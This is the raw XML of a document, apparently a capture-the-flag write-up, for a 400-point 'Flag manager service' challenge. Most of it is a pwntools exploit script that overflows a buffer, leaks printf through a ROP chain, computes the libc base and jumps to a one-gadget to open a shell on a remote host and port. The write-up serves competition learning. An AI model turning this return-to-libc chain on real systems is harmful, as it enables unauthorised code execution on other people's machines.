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160" w:before="160" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="3c763d"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vs15uet6e7tf" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="337ab7"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Flag manager service</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="3c763d"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (400pts)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#!/usr/bin/env python2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-*- coding: utf-8 -*-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pwn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time</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">exe = context.binary = ELF(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'flag_manager01'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host = args.HOST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'89.38.208.144'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port = int(args.PORT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11115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(argv=[], *a, **kw):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'''Execute the target binary locally'''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args.GDB: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gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)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process([exe.path] + argv, *a, **kw)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remote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(argv=[], *a, **kw):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'''Connect to the process on the remote host'''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io = connect(host, port)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args.GDB:</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        gdb.attach(io, gdbscript=gdbscript)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(argv=[], *a, **kw):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'''Start the exploit against the target.'''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args.LOCAL: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local(argv, *a, **kw)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remote(argv, *a, **kw)</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">gdbscript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'''</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">break *0x{exe.symbols.main:x}</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">continue</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">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.format(**locals())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-- Exploit goes here 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context.terminal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'tilix'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'-e'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io = start()</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">padding    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0x58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printf_plt  = p64(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0x400590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printf_got  = p64(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0x601020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main        = p64(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0x4006d7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pop_rdi     = p64(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0x4008a3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io.sendline(padding + pop_rdi + printf_got + printf_plt + main)</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">io.sendline(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'test'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io.recvuntil(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'O!\n'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#io.recvline()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printf_mem = u64(io.recv(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)[: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].strip().ljust(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'\x00'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log.success(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'Printf in memory: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hex(printf_mem))</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">libc = ELF(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'./libc-2.27.so'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libc.base = printf_mem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0x64e80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io.sendline(padding + p64(libc.base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0x4f2c5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br w:type="textWrapping"/>
              <w:t xml:space="preserve">io.interactive()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imisoaractf.ro/challenge?id=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